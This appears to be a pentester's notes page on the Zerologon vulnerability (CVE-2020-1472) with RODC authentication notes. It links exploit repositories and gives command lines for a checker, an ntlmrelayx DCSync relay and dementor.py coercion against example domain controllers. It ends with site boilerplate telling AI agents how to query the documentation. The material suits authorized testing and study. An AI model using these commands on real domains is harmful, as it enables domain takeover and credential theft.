# Zerologon

* [\[PDF\] Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) (Tom Tervoort)](https://www.secura.com/uploads/whitepapers/Zerologon.pdf)
* [\[PDF\] Understanding and Exploiting Zerologon (Lucideus)](https://dl.packetstormsecurity.net/papers/general/Understanding_and_Exploiting_Zerologon.pdf)

{% embed url="<https://twitter.com/_dirkjan/status/1306280566313156608>" %}

Check:

* <https://github.com/SecuraBV/CVE-2020-1472>

```
$ python3 zerologon_tester.py DC01 10.10.13.38
```

Exploit:

* <https://github.com/dirkjanm/CVE-2020-1472>
* <https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472>

Exploits above **will break the domain!** Use this technique by @dirkjanm to abuse Zerologon safely:

* <https://dirkjanm.io/a-different-way-of-abusing-zerologon/>

```
$ ntlmrelayx.py -t dcsync://DC01.megacorp.local -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC02.megacorp.local
```

## RODC Notes

Checking that a DC is a RODC (see if `WRITABLE` flag is present):

```
PS > nltest.exe /dsgetdc:megacorp.local
PS > nltest.exe /dsgetdc:megacorp.local /server:DC1
```

* <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9>
* <https://lists.samba.org/archive/samba-technical/2016-November/117016.html>
* <https://github.com/gentilkiwi/mimikatz/blob/fe4e98405589e96ed6de5e05ce3c872f8108c0a0/mimikatz/modules/kuhl_m_lsadump.c#L2467>
* <https://social.technet.microsoft.com/Forums/Lync/en-US/3f29f03e-9d9b-43ba-b628-3f0afc25352e/user-amp-computer-authentication-through-rodc?forum=winserverDS>

> "When a user authenticates to an RODC a check is performed to see if the password is cached. If the password is cached, the RODC will authenticate the user account locally. If the user’s password is not cached, then the RODC forwards the authentication request to a writable Domain Controller which in turn authenticates the account and passes the authenticated request back to the RODC. Once the user account is authenticated, the RODC makes another request for the replication of the user’s password in a unidirectional replication providing the account has been configured to allow replication. In order to allow the user password to be cached on RODC, you could set up it by configuring the Password Replication Policy."

So when authenticating at a RODC and Password Replication Policy rejects caching the machine password, then `STATUS_NO_TRUST_SAM_ACCOUNT` may be met.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/zerologon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.